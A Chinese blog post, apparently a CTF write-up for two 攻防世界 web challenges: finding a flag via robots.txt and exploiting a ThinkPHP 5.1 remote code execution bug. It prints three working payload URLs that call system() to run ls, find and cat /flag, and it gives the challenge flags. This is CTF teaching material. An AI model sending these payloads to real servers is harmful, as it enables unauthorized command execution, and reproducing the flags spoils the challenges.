攻防世界_web高手进阶_Training-WWW-Robots、php_rce

最新推荐文章于 2024-06-12 21:10:39 发布
最新推荐文章于 2024-06-12 21:10:39 发布
阅读量226 收藏
点赞数
分类专栏: 攻防世界
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_49657263/article/details/112492324
版权
"本文探讨了Python爬虫中如何通过robots.txt发现ThinkPHP 5.1版本的远程代码执行漏洞,并详细解析了payload的构造与作用。通过实例展示了如何利用这个漏洞获取flag:cyberpeace{dc7c764839800a9e351c917915b1e03e}
摘要由CSDN通过智能技术生成

Training-WWW-Robots

robots协议是Python爬虫时涉及到的一个协议,在URL后直接加上/robots.txt,显示如下图:

然后如图所示把/robots.txt改成/f10g.php后得到flag:

cyberpeace{dc7c764839800a9e351c917915b1e03e}

php_rce

根据题目的writeup:

百度后可知5.1版本的thinkPHP漏洞为 rce,在URL后加上payload

注:payload大概可以理解为关键信息

图中的payload1:index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system& vars[1][]=ls

           payload2:index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system& vars[1][]=find / -name “flag*”

           payload3:index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system& vars[1][]=cat /flag

 

 

无晴_
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
【网络安全 | CTF】攻防世界 Training-WWW-Robots 解题详析
等风来
05-20 3397
在这个小训练挑战中,你将学习 Robots_exclusion_standard(机器人排除标准)。robots.txt 文件是由网络爬虫用来检查是否允许他们爬行和索引你的网站或仅部分内容。
SMBGhost_RCE_PoC-master.zip
06-11
标题中的"SMBGhost_RCE_PoC-master.zip"是一个压缩包文件,其中包含了与名为"SMBGhost"的安全漏洞相关的远程代码执行(RCE)的概念验证(PoC)代码。这个漏洞被称为CVE-2020-0796,它是在服务器消息块版本3(SMBv3)...
攻防世界WEB进阶Training-WWW-Robots
harry_c的博客
09-29 2845
攻防世界WEB进阶Training-WWW-Robots一、思路二、实操三、答案 难度系数: 1星 题目来源: 暂无 题目描述:暂无 题目场景: 略 题目附件: 暂无 一、思路 首先题目给出了Robots,name根据主题我们找到对应的文件,直接:http://IP:端口/robots.txt就能够访问,得到robots协议 User-agent: * Disallow: /fl0g.php ...
攻防世界--lottery、ez_curl、ics-05
最新发布
qq_75120258的博客
06-12 971
array()函数是用来创建一个PHP数组json_decode :对 JSON 格式的字符串进行解码,转换为 PHP 变量。
攻防世界-web-高手进阶区-Training-WWW-Robots
wyj_1216 House
02-03 491
题目 writeup 首先看到关键点:robots.txt 于是想到: /robots.txt 查看相应信息 发现并查看:/f10g.php 得到flag~
攻防世界Training-WWW-Robots
qq_44111753的博客
11-14 313
WP 攻防世界 Training-WWW-Robots 题目 writeup 很明显,查看robots.txt文件 提示查看fl0g.php文件 得到flag了~
攻防世界 Web Training-WWW-Robots
MrTreebook的博客
03-12 252
攻防世界 Web Training-WWW-Robots1.打开网址 1.打开网址 大概意思是说需要查看robobs协议 地址栏直接输入robots.txt 看到fl0g.php是不可抓取的 但是丝毫不影响我访问 直接访问
cve_2019_0708_bluekeep_rce.rb
09-07
2019年5月14日微软官方发布安全补丁,修复了Windows远程桌面服务的远程代码执行漏洞,该漏洞影响了某些旧版本的Windows系统。此漏洞是预身份验证且无需用户交互,这就意味着这个漏洞可以通过网络蠕虫的方式被利用。...
远程POC-SMBGhost_RCE_PoC.zip
06-09
CVE-2020-0796漏洞公告显示,SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码。攻击者利用该漏洞无须权限即可实现远程代码执行,受黑客...
VMware_vCenter_UNAuthorized_RCE_CVE-2021-21972:VMware vCenter未授权RCE(CVE-2021-21972)
03-04
VMware_vCenter_UNAuthorized_RCE_CVE-2021-21972 zoomeye dork:app:“ VMware vCenter” 使用pocsuite3编写的无害检测 ,使用近一年的数据进行探测: 成功率大约:1551/3998 = 39%
fastjson_rce_tool-master.zip
05-14
《深入解析Fastjson RCE漏洞及利用工具》 Fastjson是阿里巴巴开源的一个高性能的JSON库,广泛应用于Java项目中,由于其高效的解析速度和简洁的API设计,深受开发者喜爱。然而,随着其广泛应用,安全问题也逐渐浮出...
攻防世界Training-WWW-Robots
qq_58970968的博客
10-31 471
根据题目提示直接构造payload /robot.txt ,课看到/fl0g.php,继续构造就可看到flag; 总结:robots.txt 文件是一个文本文件,使用任何一个常见的文 本编辑器,比如 Windows 系统自带的 Notepad,就可以创 建和编辑它[1] 。robots.txt 是一个协议,而不是一个命令。 robots.txt 是搜索引擎中访问网站的时候要查看的第一个 文件。robots.txt 文件告诉蜘蛛程序在服务器上什么文件 是可以被查看的 ...
Training: WWW-Robots (HTTP, Training)
Howie‘s Blog
07-06 1601
Training: WWW-Robots (HTTP, Training) 题目描述 In this little training challenge, you are going to learn about the Robots_exclusion_standard. The robots.txt file is used by web crawlers to check if they ...
wechall做题之www-robots
weixin_43700692的博客
06-24 807
wechall之 www-robots
Training-WWW-Robots (攻防世界)
HackerYY的博客
12-01 2929
攻防世界Training-WWW-Robots 和之前的题几乎一模一样 内附解题过程
攻防世界-Training-WWW-Robots详解
Mr_helloword的博客
08-10 1786
Training-WWW-Robots 根据题目robots.txt flag: cyberpeace{e9c0801e3ed84033430148b6b40252ff}
wordpress博客robots.txt初级修改记录!
WWWWudm123的博客
09-25 487
初级接触wordpress,可以直接复制到robots.txt里面,注意sitemap那行记住把域名改成自己的网站地图即可。 User-agent: * Disallow: /wp-admin/ Disallow: /wp-content/ Disallow: /wp-includes/ Disallow: /*/comment-page-* Disallow: /*?replytocom=* ...
ctf-攻防世界-webTraining-WWW-Robots
一只菜鸟的博客
11-10 266
题目为robots,猜测大概是考察robots.txt 打开环境后发现果然如此,还给出了一段英文介绍。百度翻译如下: 地址后加/robots.txt访问,显示一个形似flag的文件,去访问一下,出现flag 关于robots.txt: (以下内容时间久远,来源不可查,侵删) robots.txt是搜索引擎中访问网站的时候要查看的第一个文件。当一个搜索蜘蛛访问一个站点时,它会首先检查该站点根目录下是否存在robots.txt,如果存在,搜索机器人就会按照该文件中的内容来确定访问...
攻防世界php_rce
08-26
- *1* *2* *3* [攻防世界-web篇(php_rce)详解](https://blog.csdn.net/qq_54803507/article/details/127041653)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值